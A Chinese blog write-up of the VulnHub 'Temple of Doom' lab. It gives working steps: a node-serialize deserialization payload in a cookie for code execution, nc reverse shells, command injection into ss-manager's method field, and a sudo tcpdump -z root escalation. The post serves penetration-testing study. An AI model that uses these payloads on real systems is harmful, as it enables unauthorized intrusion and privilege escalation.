Temple of Doom靶机

最新推荐文章于 2024-08-28 08:48:44 发布
最新推荐文章于 2024-08-28 08:48:44 发布
阅读量268 收藏 5
点赞数 4
文章标签: web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73074638/article/details/141105667
版权

1.信息收集

看到666端口开启了http服务

访问页面没什么东西

burp抓包,得到profile的值应该为一个url编码和base64编码的值

CTRL+SHIFT+U #url解码

CTRL+SHIFT+B #base64解码

得到遗传json格式的值

关闭拦截后页面直接报错,提示可能是token有错

然后返回看抓取的数据包

发现Friday字段前面少了引号,然后我们在对其进行base64编码和url编码

CTRL+B #base64编码

CTRL+U #url编码

尝试着修改cookie得值为:profile={"username":"Admin"},然后对其编码

发现即使没有token令牌也不会报错

尝试输入一个自定义用户名Bob

2.getshell

利用序列化

shell:

{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami',(e,out,err)=>{console.log(out);}); }()"}

这是具体函数的介绍

也就是执行了whoami命令并输出到控制台

所以得到我们当前用户为nodeadmin

查看一下当前文件下的内容

反弹shell

nc -e /bin/bash 192.168.1.6 1337 (最好按照这样来,后面还需要其他的端口,别到时后被占了)

编码

反弹成功

3.提权

python -c 'import pty;pty.spawn("/bin/bash")' #交互式shell

cd /home

ls -al有两个用户

cd fireman发现没有权限查看,说明fireman是一个高权限用户

查看进程

ps aux | grep fireman

/user/loacl/bin/ss-manger

ss-manager 是 Shadowsocks(socks5代理)的缩写

nc -u 127.0.0.1 8839
add: {“server_port":8003, "password":"test", "method":"||nc -e /bin/sh 192.168.1.6 4444||"}

ps:如果跟我一样一连就崩尝试重启这个靶机就好了

还是会报错,查找资料执行下面命令

add: {"server_port":8003, "password":"test", "method":"||nc 192.168.1.6 4444 -e /bin/bash||"}

终于好了

python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l

发现tcpdump可以利用

cd /tmp(因为可读可写)

echo "nc -e /bin/bash 192.168.1.6 8888" > shell

chmod 777 shell

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell -Z root

这时候没有反弹成功

需要切断和fireman的shell

按ctrl + c

这时候发现反弹成功

python -c 'import pty;pty.spawn("/bin/bash")'

再回到根目录

cd

ls -al

cat flag.txt

pingyao周杰伦
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白的靶机VulnHub-Temple of Doom
wo41ge的博客
01-20 628
靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/ 开机界面就是这 确定 靶机的ip地址:192.168.0.114 靶机开放了22端口666端口 22端口 是ssh服务 没账号密码 是进不去的 先放着 666端口 有http服务,有Node.js 去康康呗 直接访问 正在施工,稍后再来! 直接爆破一下 试试 nikto 和dirb … 没啥有用的信息 这里 666端口 开放了Node.js ...
vulnhub Temple of Doom: 1
箭雨镜屋
11-30 2301
端口扫描-->http访问,burp抓包分析-->node.js反序列化漏洞得到nodeadmin反弹shell-->linpeas提权检测-->利用ss-manager命令执行漏洞得到fireman的反弹shell-->sudo tcpdump提权
Temple of Doom靶场&nodejs获取shell&ss-manager漏洞&tcpdump提权
jockerboss的博客
03-26 1861
Temple of Doom靶场&nodejs获取shell&ss-manager漏洞&tcpdump提权
No.25-VulnHub-Temple of Doom: 1-Walkthrough渗透学习
qq_34801745的博客
01-21 1283
** VulnHub-Temple of Doom: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/ 靶机难度:中级(CTF) 靶机发布日期:2018年6月8日 靶机描述: [+]由https://twitter.com/0katz创建的CTF [+]难度:简单/中级 [+]在VirtualBox中...
Portal Of Doom: Undead Rising-crx插件
03-14
厄运之门:不死族崛起是一款很棒且激烈的科幻恐怖游戏 您在空间站上接到了求救电话 厄运之门:不死族崛起是一款很棒且激烈的科幻恐怖游戏。 您在空间站上接到了求救电话,这是进行实验的地方。 ...
Number Squares of Doom-开源
04-27
《数独的终极挑战——"Number Squares of Doom"开源解析》 在众多的益智游戏中,数独无疑是最受欢迎的之一,它以其独特的逻辑推理和数字填充方式吸引了无数玩家。然而,今天我们要探讨的“Number Squares of Doom”...
Attal : Lords of doom-开源
04-27
Attal是一款主题化的回合制策略游戏。 您用军队控制上议院,您必须与对手作战并达成任务。
网络安全售前入门02——产品了解
打工人
08-24 676
WEB应用防火墙也叫简称WAF。对Web应用系统进行防护,通过WAF的安全防护能力,保障Web应用系统的正常、稳定运行。有硬件版与软件版,也有云WAF(通过域名解释重定向到安全厂商云上进行流量清洗再打回给企业业务系统上)。下面以硬件版WAF作为例子展开介绍。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
08-23 1565
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 1557
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
网络安全售前入门03——审计类产品了解
打工人
08-25 914
为方便初接触网络安全售前工作的小伙伴了解网安行业情况,我制作一系统售前入门(安全产品,安全服务,法律法规等)文章介绍,希望能给初进网安职场的小伙伴提供一点帮助。仅适合入门小白。
网络安全系统性学习路线「全文字详细介绍」
HUANGXIN9898的博客
08-27 1225
🤟 基于入门网络安全打造的:👉黑客&网络安全入门&进阶学习资源包 一、基础与准备 网络安全行业与法规 想要从事网络安全行业,必然要先对行业建立一个整体的认知,了解网络安全对于国家和社会的作用,避免出现“一叶障目,不见森林”的情况。 Linux 操作系统(网安) 很多初学者也常忽略Linux的重要性,认为学习的重头戏在框架等方面,但其实Linux也是重中之重。 计算机网络基础 计算机网络基础是网络/运维工程师都需掌握的知识,但往往会被忽略。但是它是非常重要的。 HTML(
深度解析:防火墙技术在网络安全中的应用与发展
最新发布
A526847的博客
08-28 176
网络安全领域,防火墙技术作为一道至关重要的防线,始终扮演着保护内部网络免受外部威胁侵害的关键角色。随着网络技术的不断演进和攻击手段的日益复杂,防火墙技术也在不断发展和完善,以应对不断升级的安全挑战。本文将对防火墙技术在网络安全中的应用与发展进行深度解析。
Web安全-网络安全_学习路线发展方向(如何成为一名黑客Hacker?)
刘鑫磊
08-24 374
网络安全学习路线发展方向
网络安全(黑客)自学
2401_85027652的博客
08-23 1285
你的所有这些活动都需要网络,如果你的网络安全,你的个人信息可能会被窃取,你的银行账户可能会被盗,你的社交媒体账户可能会被滥用。例1:假设你是一家公司的老板,你的公司的所有业务都在网络上运行,包括与客户的沟通、订单处理、产品销售等。如果你的网络被攻击,那么你的业务就会受到影响,你可能会失去客户,你的公司可能会遭受重大损失。随着我们生活和工作的方方面面越来越依赖网络,任何形式的网络攻击都可能导致灾难性的结果。网络安全是一种保护:它涉及保护我们的设备和信息,从各种威胁,如病毒和蠕虫,到更复杂的形式的网络犯罪。
全国上市公司网络安全风险指数(2001-2023年)
samLi0620的博客
08-24 413
本数据参考耿勇老师等(2024)做法采集了2001-2023年的上市公司年报,所有年报均来自于深交所和上交所官方网站,通过对上市公司的年报进行精读,提取出包括网络安全网络攻击等在内的39个关键词构成企业网络安全风险关键词词典,进一步对上市公司年报中管理层分析与讨论文本进行关键词搜索、匹配与词频统计,得到每个安全风险关键词的出现频率进行汇总。[2] 耿勇,向晓建,万攀兵.供应链信任衰退:网络安全风险与企业贸易信贷[J/OL].中国工业经济,2024,(05):135-154[2024-08-21].
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值